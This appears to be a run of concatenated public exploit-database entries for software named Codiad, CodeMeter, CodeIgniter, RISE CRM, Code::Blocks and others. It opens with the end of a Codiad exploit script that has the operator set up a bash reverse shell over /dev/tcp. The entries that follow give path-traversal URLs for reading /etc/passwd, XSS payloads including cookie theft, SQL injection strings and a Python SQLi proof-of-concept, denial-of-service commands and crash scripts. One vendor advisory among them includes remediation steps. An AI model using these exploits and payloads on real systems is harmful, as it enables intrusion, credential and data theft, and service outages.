host = sys.argv[4]
port = int(sys.argv[5])
platform = sys.argv[6]
if platform.lower().startswith("win"):
print("[+] Please execute the following command on your vps: ")
print("nc -lnvp %d" % (port))
if not promote_yes("[+] Please confirm that you have done the two command above [y/n]"):
exit(1)
else:
print("[+] Please execute the following command on your vps: ")
print("echo 'bash -c \"bash -i >/dev/tcp/%s/%d 0>&1 2>&1\"' | nc -lnvp %d" % (host, port + 1, port))
print("nc -lnvp %d" % (port + 1))
if not promote_yes("[+] Please confirm that you have done the two command above [y/n]"):
exit(1)
print("[+] Starting...")
if not login(domain, username, password):
print("[-] Login failed! Please check your username and password.")
exit(2)
print("[+] Login success!")
print("[+] Getting writeable path...")
path = get_write_able_path(domain)
if path == False:
print("[+] Get current path error!")
exit(3)
print("[+] Writeable Path : %s" % (path))
print("[+] Sending payload...")
exploit(domain, username, password, host, port, path, platform)
print("[+] Exploit finished!")
print("[+] Enjoy your reverse shell!")
if __name__ == "__main__":
main()
[+]Title: Codiad v2.5.3 - LFI Vulnerability
[+]Author: TUNISIAN CYBER
[+]Date: 12/03/2015
[+]Type:WebApp
[+]Risk:High
[+]Overview:
Pie Register 2.x suffers, from a Local File Disclosure vulnerability.
[+]Proof Of Concept:
[PHP]
//////////////////////////////////////////////////////////////////
// Run Download
//////////////////////////////////////////////////////////////////
if(isset($_GET['type']) && ($_GET['type']=='directory' || $_GET['type']=='root')){
// Create tarball
$filename = explode("/",$_GET['path']);
//$filename = array_pop($filename) . "-" . date('Y.m.d') . ".tar.gz";
$filename = array_pop($filename) . "-" . date('Y.m.d');
$targetPath = DATA . '/';
$dir = WORKSPACE . '/' . $_GET['path'];
if(!is_dir($dir)){
exit('<script>parent.codiad.message.error("Directory not found.")</script>');
}
//////////////////////////////////////////////////////////////////
// Check system() command and a non windows OS
//////////////////////////////////////////////////////////////////
if(isAvailable('system') && stripos(PHP_OS, 'win') === false){
# Execute the tar command and save file
$filename .= '.tar.gz';
system("tar -pczf ".$targetPath.$filename." -C ".WORKSPACE." ".$_GET['path']);
$download_file = $targetPath.$filename;
}elseif(extension_loaded('zip')){ //Check if zip-Extension is availiable
//build zipfile
require_once 'class.dirzip.php';
$filename .= '.zip';
$download_file = $targetPath.$filename;
DirZip::zipDir($dir, $targetPath .$filename);
}else{
exit('<script>parent.codiad.message.error("Could not pack the folder, zip-extension missing")</script>');
}
}else{
$filename = explode("/",$_GET['path']);
$filename = array_pop($filename);
$download_file = WORKSPACE . '/' . $_GET['path'];
}
[PHP]
http://demo.codiad.com/i/197156553/components/filemanager/download.php?path=../../../../../../../../../../../etc/passwd&type=undefined
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
INDEPENDENT SECURITY RESEARCHER
PENETRATION TESTING SECURITY
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# Exploit Title: Codiad 2.4.3 - Cross Site Scripting - Local File Inclusion Vulnerability's
# Date: 19/12/2014
# Url Vendor: http://codiad.com/
# Vendor Name: Codiad
# Version: 2.4.3
# CVE: CVE-2014-1137
# Author: TaurusOmar
# Tiwtter: @TaurusOmar_
# Email: taurusomar13@gmail.com
# Home: overhat.blogspot.com
# Tested On: Bugtraq Optimus
# Risk: High
Description
Codiad is a web-based IDE framework with a small footprint and minimal requirements.
Codiad was built with simplicity in mind, allowing for fast, interactive development without the massive overhead of some of the larger desktop editors. That being said even users of IDE's such as Eclipse, NetBeans and Aptana are finding Codiad's simplicity to be a huge benefit. While simplicity was key, we didn't skimp on features and have a team of dedicated developer actively adding more.
------------------------
+ CROSS SITE SCRIPTING +
------------------------
#Exploiting Description - Get into code xss in next path
/components/filemanager/dialog.php?action=rename&path=3&short_name=
#P0c
http://site.com/components/filemanager/dialog.php?action=rename&path=3&short_name='"><img src=x onerror=prompt(1);>
#Proof Concept
http://i.imgur.com/rr9b42K.jpg
------------------------
+ Local File Incluson +
------------------------
# Exploiting Description - Get into path in ur' browser and download private file server /etc/passwd
#P0c
http://site.com/components/filemanager/download.php?path=../../../../../../../../../../../etc/passwd&type=undefined
#Proof Concept
http://i.imgur.com/LSm360S.jpg
source: https://www.securityfocus.com/bid/50854/info
CoDeSys is prone to multiple denial-of-service vulnerabilities.
An attacker can exploit these issues to crash the application and deny service to legitimate users.
udpsz -T -c "POST / HTTP/1.0\r\nContent-Length: 4294967295\r\n\r\n" SERVER 8080 -1
source: https://www.securityfocus.com/bid/50854/info
CoDeSys is prone to multiple denial-of-service vulnerabilities.
An attacker can exploit these issues to crash the application and deny service to legitimate users.
udpsz -T -c "BLAH / HTTP/1.0\r\n\r\n" SERVER 8080 -1
# # # # #
# Exploit Title: CodePaul ClipMass - Video Portal Site - SQL Injection
# Google Dork: N/A
# Date: 10.02.2017
# Vendor Homepage: http://codepaul.com/
# Software Buy: https://codecanyon.net/item/codepaul-clipmass-video-portal-site/14681505
# Demo: http://codepaul.com/clipmass/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/search?keyword=[SQL]
# # # # #
# Exploit Title: CodeMeter 6.60 - 'CodeMeter.exe' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2020-08-05
# Vendor Homepage: https://www.wibu.com/us/products/codemeter/runtime.html
# Tested Version: 6.60
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "CodeMeter" | findstr /i /v """
CodeMeter Runtime Server CodeMeter.exe C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe Auto
# Service info:
C:\>sc qc CodeMeter.exe
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: CodeMeter.exe
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START (DELAYED)
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : CodeMeter Runtime Server
DEPENDENCIES : Tcpip
: Winmgmt
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
Document Title:
===============
Wibu Systems AG CodeMeter 6.50 - Persistent XSS Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2074
ID: FB49498
Acknowledgements: https://www.flickr.com/photos/vulnerabilitylab/36912680045/
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-13754
CVE-ID:
=======
CVE-2017-13754
Release Date:
=============
2017-09-04
Vulnerability Laboratory ID (VL-ID):
====================================
2074
Common Vulnerability Scoring System:
====================================
3.5
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
CodeMeter is the universal technology for software publishers and intelligent device manufacturers, upon which all
solutions from Wibu-Systems are built. You want to protect the software you have developed against piracy and
reverse engineering. CodeMeter requires your attention only once: its integration in your software and your business
workflow is necessary at one point in time only. Protection Suite is the tool that automatically encrypts your
applications and libraries. In addition, CodeMeter offers an API for custom integration with your software.
(Copy of the Homepage: http://www.wibu.com/us/codemeter.html )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent input validation vulnerability in the official
Wibu Systems CodeMeter WebAdmin v6.50 application.
Vulnerability Disclosure Timeline:
==================================
2017-05-20: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
2017-05-21: Vendor Notification (Wibu Systems AG - Security Department)
2017-05-22: Vendor Response/Feedback (Wibu Systems AG - Security Department)
2017-08-01: Vendor Fix/Patch (Wibu Systems AG - Service Developer Team)
2017-08-20: Security Acknowledgements (Wibu Systems AG - Security Department)
2017-09-04: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Wibu-Systems AG
Product: CodeMeter & Control Panel - WebAdmin (Web-Application) 6.50.2624.500
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A persistent input validation vulnerability has been discovered in the Wibu Systems AG CodeMeter WebAdmin v6.50 web-server web-application.
The vulnerability allows remote attackers to inject own malicious script code with application-side vector to the vulnerable function or
module to followup with a compromising attack.
The input validation vulnerability has been discovered in the `server name` input field of the `advanced settings - time server` module.
The request method to inject is POST and the attack vector is located on the application-side. First the attacker injects the payload and
after it the POST request is performed to save the content permanently. After that the issue triggers on each visit an execution. The basic
validation in the application is well setup but in case of the advanced settings the validation parameter are still not implemented to secure
the function at all. The vulnerability is a classic filter input validation vulnerability. The application has no cookies and therefore the
attack risk is more minor but not that less then to ignore it. The vulnerable files are `ChangeConfiguration.html`, `time_server_list.html`
and `certified_time.html`. The `ChangeConfiguration.html` is marked as injection point for the payload. The `time_server_list.html` and
`certified_time.html` files are mared with the execution point of the issue.
The security issue was uncovered during the blurrybox hacking contest of the wibu systems ag and acknowledged by the management.
The security risk of the persistent input validation issue is estimated as medium with a cvss (common vulnerability scoring system) count of 3.5.
Exploitation of the persistent input validation web vulnerability requires low user interaction and a privileged web-application user account.
Successful exploitation of the vulnerability results in persistent phishing attacks, persistent external redirects to malicious sources and
persistent manipulation of affected or connected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Advanced Settings - Time Server
Vulnerable File(s):
[+] ChangeConfiguration.html
Vulnerable Parameter(s):
[+] server name
Affected Module(s):
[+] time_server_list.html
[+] certified_time.html
Proof of Concept (PoC):
=======================
The persistent input validation vulnerability can be exploited by remote attackers with privileged user account and with low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Start the CodeMeter software
2. Open the webadmin gui
3. Move to advanced settings
4. Open the time-server module
5. Click the plus to add a new time server
Note: The request method is POST
6. Inject a test script code payload with matching domain and save via POST
7. The code is saved and executes of the dbms in the time-server list module index
8. Successful reproduce of the vulnerability!
Note: The method can be automated by usage of post method requester to include a payload.
PoC: Payload (Exploitation)
cmtime.codehacker.de/>"<img src="evil.source" onload=alert("GUTENMORGEN")>
cmtime.codehacker.de/>"<iframe src="evil.source" onload=alert("GUTENMORGEN")>
PoC: Vulnerable Source
<div id="time_server_to_add"><input id="TimeServerId1" name="time_server_list_list" value="cmtime.codemeter.com"
type="radio"><label class="time_server_list_list_label" for="TimeServerId1"><span class="ct100_t bld ssl_number_space">1.
</span>cmtime.codemeter.com<span class="ssl_up" onclick="onClickSSLUp(this);" style="visibility: hidden;"><span class="fa
fa-arrow-up fa-list-buttons"></span></span><span class="ssl_down" onclick="onClickSSLDown(this);"><span class="fa fa-arrow-down
fa-list-buttons"></span></span><span class="ssl_delete" onclick="onClickDelete(this);"><span class="fa fa-trash-o fa-list-buttons">
</span></span></label><input id="TimeServerId3" name="time_server_list_list" value="cmtime.codemeter.de" type="radio">
<label class="time_server_list_list_label" for="TimeServerId3"><span class="ct100_t bld ssl_number_space">2. </span>cmtime.codemeter.de
<span class="ssl_up" onclick="onClickSSLUp(this);"><span class="fa fa-arrow-up fa-list-buttons"></span></span><span class="ssl_down"
onclick="onClickSSLDown(this);"><span class="fa fa-arrow-down fa-list-buttons"></span></span><span class="ssl_delete"
onclick="onClickDelete(this);"><span class="fa fa-trash-o fa-list-buttons"></span></span></label><input id="TimeServerId4"
name="time_server_list_list" value="cmtime.codemeter.us" type="radio"><label class="time_server_list_list_label" for="TimeServerId4">
<span class="ct100_t bld ssl_number_space">3. </span>cmtime.codemeter.us<span class="ssl_up" onclick="onClickSSLUp(this);">
<span class="fa fa-arrow-up fa-list-buttons"></span></span><span class="ssl_down" onclick="onClickSSLDown(this);" style="visibility:
visible;"><span class="fa fa-arrow-down fa-list-buttons"></span></span><span class="ssl_delete" onclick="onClickDelete(this);">
<span class="fa fa-trash-o fa-list-buttons"></span></span></label><input id="cmtime.codehacker.de/>" <img="" src="evil.source">"
type="radio" name="time_server_list_list" value="cmtime.codehacker.de/>"<img src="evil.source">"/><label class="time_server_list_list_label"
for="cmtime.codehacker.de/>" <img="" src="evil.source">"><span id="ssl_number_cmtime.codehacker.de/>" <img="" src="evil.source">"[EXECUTABLE PAYLOAD!]
class="ct100_t bld ssl_number_space"></span>cmtime.codehacker.de/>"<img src="evil.source"><span class="ssl_up"
onclick="onClickSSLUp(this);"><span class="fa fa-arrow-up fa-list-buttons"></span></span><span class="ssl_down"
onclick="onClickSSLDown(this);" style="visibility: hidden;"><span class="fa fa-arrow-down fa-list-buttons"></span></span>
<span class="ssl_delete" onclick="onClickDelete(this);"><span class="fa fa-trash-o fa-list-buttons"></span></span></label></div>
--- PoC Session Logs (GET) ---
Status: 200[OK]
POST http://localhost:22350/actions/ChangeConfiguration.html
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[1544]
Mime Type[text/html]
Request Header:
Host[localhost:22350]
User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Content-Type[application/x-www-form-urlencoded]
Content-Length[255]
Referer[http://localhost:22350/configuration/certified_time.html]
Cookie[com.wibu.cm.webadmin.lang=de-DE]
Connection[keep-alive]
Upgrade-Insecure-Requests[1]
POST-Daten:
Action[CertifiedTimeConfiguration]
TimeServerList[cmtime.codemeter.com%7Ccmtime.codemeter.de%7Ccmtime.codemeter.us%7Ccmtime.codehacker.de/>"<img src="evil.source" onload=alert("GUTENMORGEN")>%7C]
SoapTimeOut[20]
certified_time_time_out[20]
ApplyButton[Apply]
WaFormGuard[v0V839tW3xkpa6jC26kYsvZJxe0UFJCl4%2FB2ipA6Xpwv]
Response Header:
Server[WIBU-SYSTEMS HTTP Server]
Date[21 May 2017 16:00:21 +0000]
Content-Type[text/html; charset=utf-8]
X-Frame-Options[SAMEORIGIN]
x-xss-protection[1; mode=block]
Accept-Ranges[bytes]
Content-Length[1544]
-
Status: 200[OK]
GET http://localhost:22350/configuration/iframe/evil.source[PAYLOAD EXECUTION]
Load Flags[LOAD_NORMAL] Größe des Inhalts[2320] Mime Type[text/html]
Request Header:
Host[localhost:22350]
User-Agent[zero-zero]
Accept[*/*]
Referer[http://localhost:22350/configuration/iframe/time_server_list.html]
Cookie[com.wibu.cm.webadmin.lang=de-DE]
Connection[keep-alive]
Response Header:
Server[WIBU-SYSTEMS HTTP Server]
Date[19 May 2017 21:02:23 +0000]
Connection[close]
Content-Type[text/html; charset=utf-8]
X-Frame-Options[SAMEORIGIN]
x-xss-protection[1; mode=block]
Accept-Ranges[bytes]
Content-Length[2320]
-
Status: 200[OK]
GET http://localhost:22350/configuration/iframe/evil.source
Mime Type[text/html]
Request Header:
Host[localhost:22350]
User-Agent[zero-zero]
Accept[*/*]
Referer[http://localhost:22350/configuration/iframe/time_server_list.html]
Cookie[com.wibu.cm.webadmin.lang=de-DE]
Connection[keep-alive]
Response Header:
Server[WIBU-SYSTEMS HTTP Server]
Date[19 May 2017 21:06:56 +0000]
Connection[close]
Content-Type[text/html; charset=utf-8]
X-Frame-Options[SAMEORIGIN]
x-xss-protection[1; mode=block]
X-Content-Type-Options[nosniff]
Accept-Ranges[bytes]
Content-Length[2320]
Reference(s):
http://localhost:22350/
http://localhost:22350/configuration/
http://localhost:22350/configuration/ChangeConfiguration.html
http://localhost:22350/configuration/certified_time.html
http://localhost:22350/configuration/time_server_list.html
Solution - Fix & Patch:
=======================
1. Restrict the input field and disallow the usage of special chars like in the other input fields
2. Parse the input field and escape the content
3. Parse in the visible listing the output location of the item
4. Setup a secure exception-handling to handl illegal events
5. Include a proper validation mask to the form to prevent further injection attacks
The security vulnerability has been patched in the version 6.50b.
Security Risk:
==============
The seurity risk of the persistent input validation web vulnerability in the web-server webadmin web-application is estimated as medium (CVSS 3.5).
Earlier version releases up to codemeter 6.50 may be affected as well by the cross site scripting web vulnerability.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or
implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its
suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface
websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories
or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails,
phone numbers, conversations or anything else to journalists, investigative authorities or private individuals.
Domains: www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission.
Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
source: https://www.securityfocus.com/bid/54620/info
CodeIgniter is prone to a security-bypass vulnerability.
An attacker can exploit this issue to bypass XSS filter protections and perform cross-site scripting attacks.
CodeIgniter versions prior to 2.1.2 are vulnerable.
Build an application on CodeIgniter 2.1.0:
// application/controllers/xssdemo.php
<?php if ( ! defined('BASEPATH')) exit('No direct script access allowed');
class Xssdemo extends CI_Controller {
public function index() {
$data['xss'] =
$this->security->xss_clean($this->input->post('xss'));
$this->load->view('xssdemo', $data);
}
}
// application/views/xssdemo.php
<form method=post>
<textarea name=xss><?php echo htmlspecialchars($xss);
?></textarea>
<input type=submit />
</form>
<p>XSS:
<hr />
<?php echo $xss ?>
Launch http://app-uri/index.php/xssdemo and try above vectors.
# Exploit Title: CodeCanyon RISE CRM 3.7.0 - SQL Injection
# Google Dork: N/A
# Date: September 19, 2024
# Exploit Author: Jobyer Ahmed
# Author Homepage: https://bytium.com
# Vulnerable Version: 3.7
# Patched Version: 3.7.1
# Tested on: Ubuntu 24.04, Debian Testing
##########################################
# CVE: CVE-2024-8945
############Instruction#######################
# 1. Login to Ultimate Project Manager 3.7
# 2. Add a New Dashboard
# 3. Launch the PoC Script
#
# Usage: python3 script.py <base_url> <email> <password>
###########################################
import requests
import sys
from termcolor import colored
def login_and_capture_session(base_url, email, password):
login_url = f"{base_url}/index.php/signin/authenticate"
login_data = {"email": email, "password": password, "redirect": ""}
login_headers = {"User-Agent": "Mozilla/5.0", "Content-Type": "application/x-www-form-urlencoded"}
session = requests.Session()
response = session.post(login_url, data=login_data, headers=login_headers, verify=False)
if response.status_code == 200 and "dashboard" in response.url:
print(colored("[*] Logged in successfully.", "green"))
return session
else:
print(colored("[!] Login failed.", "red"))
return None
def send_payload(session, target_url, payload):
data = {
"id": payload,
"data": "false",
"title": "PoC Test",
"color": "#ff0000"
}
response = session.post(target_url, headers=session.headers, data=data, verify=False)
return response
def verify_vulnerability(session, target_url):
failed_payload = "-1 OR 1=2-- -"
failed_response = send_payload(session, target_url, failed_payload)
print(colored(f"\nFailed SQL Injection (False Condition) payload: {failed_payload}", "yellow"))
print(colored(f"{failed_response.text[:200]}", "cyan"))
successful_payload = "-1 OR 1=1-- -"
successful_response = send_payload(session, target_url, successful_payload)
if successful_response.status_code == 200 and "The record has been saved." in successful_response.text:
print(colored(f"[*] Vulnerability confirmed via SQL injection! Payload used: {successful_payload}", "green"))
print(colored(f"[*] Successful SQL Injection Response:\n{successful_response.text[:200]}", "cyan"))
print(colored("\nStatus: Vulnerable! Upgrade to patched version!", "red"))
else:
print(colored("\nNot vulnerable!","red"))
if __name__ == "__main__":
if len(sys.argv) != 4:
print("Usage: python3 script.py <base_url> <email> <password>")
sys.exit(1)
base_url, email, password = sys.argv[1], sys.argv[2], sys.argv[3]
session = login_and_capture_session(base_url, email, password)
if not session:
sys.exit(1)
session.headers.update({"User-Agent": "Mozilla/5.0", "Accept": "application/json", "X-Requested-With": "XMLHttpRequest"})
target_url = f"{base_url}/index.php/dashboard/save"
verify_vulnerability(session, target_url)
# # # # #
# Exploit Title: Codecanyon Clone Script - SQL Injection
# Google Dork: N/A
# Date: 08.03.2017
# Vendor Homepage: http://bsetec.com/
# Software : http://codecanyonclone.bsetec.com/
# Demo: http://www.bsetecdemo.com/codecanyonclone/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/LastAdded/?by=[SQL]
# # # # #
# Exploit Title: CodeAstro Online Railway Reservation System 1.0 - Cross Site Scripting (XSS)
# Date: 2024-08-15
# Exploit Author: Raj Nandi
# Vendor Homepage: https://codeastro.com/
# Software Link:
https://codeastro.com/online-railway-reservation-system-in-php-with-source-code/
# Version: 1.0
# Tested on: Any OS
# CVE: CVE-2024-7815
## Description:
A Cross-Site Scripting (XSS) vulnerability exists in [Application
Name/Version]. This vulnerability allows an attacker to inject and execute
arbitrary JavaScript code within the context of the user's browser session.
## Proof of Concept (PoC):
1. Navigate to [vulnerable page or input field].
2. Input the following payload: `<script>alert(document.cookie)</script>`
3. Upon execution, the script will trigger and display the user's cookies
in an alert box.
## Mitigation:
To prevent this vulnerability, ensure that all user inputs are properly
sanitized and validated before being reflected back on the webpage.
source: https://www.securityfocus.com/bid/60208/info
Code::Blocks is prone to a denial-of-service vulnerability.
An attacker can exploit this issue to cause an affected application to crash, denying service to legitimate users. Due to the nature of this issue, arbitrary code execution may be possible, but this has not been confirmed.
Code::Blocks 12.11 is vulnerable; other versions may also be affected.
#!/usr/bin/python
filename="string.txt"
buffer = "\x41" * 1000
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
source: https://www.securityfocus.com/bid/49207/info
Code Widgets Online Job Application is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following example input is available:
Username : ' or 1=1 or ''=''
Password: ' or 1=1 or ''=''
source: https://www.securityfocus.com/bid/49210/info
Code Widgets Multiple Question - Multiple Choice Online Questionaire is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/CS0099/index.asp?Q=2&A=[sqli]
source: https://www.securityfocus.com/bid/49208/info
Code Widgets DataBound Index Style Menu is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/CS0106/category.asp?cat=[sqli]
source: https://www.securityfocus.com/bid/49209/info
Code Widgets DataBound Collapsible Menu is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/CS0077/main.asp?key=[sqli]
# Exploit Title: Code Blocks 20.03 - Denial Of Service (PoC)
# Vendor Homepage: http://www.codeblocks.org/
# Software Link Download: https://sourceforge.net/projects/codeblocks/files/Binaries/20.03/Windows/codeblocks-20.03-setup.exe/download
# Exploit Author: Paras Bhatia
# Discovery Date: 2020-06-23
# Vulnerable Software: Code Blocks
# Version: 20.03
# Vulnerability Type: Denial of Service (DoS)
# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)
#Steps to Produce the Crash:
# 1.- Run python code: CodeBlocksCrash.py
# 2.- Copy content to clipboard
# 3.- Open "codeblocks.exe"
# 4.- In the "Management" section on left hand side, Click on "FSymbols" tab.
# 5.- Select "Active project's symbols" from drop down "View:" menu.
# 6.- Paste ClipBoard into the "Search:" field.
# 7.- Press Enter from keyboard.
# 8.- Crashed.
##################################################################################################################################################
#Python "CodeBlocksCrash.py" Code:
f= open("CodeBlocksCrash.txt", "w")
payload="\x41" * 5000
f.write(payload)
f.close()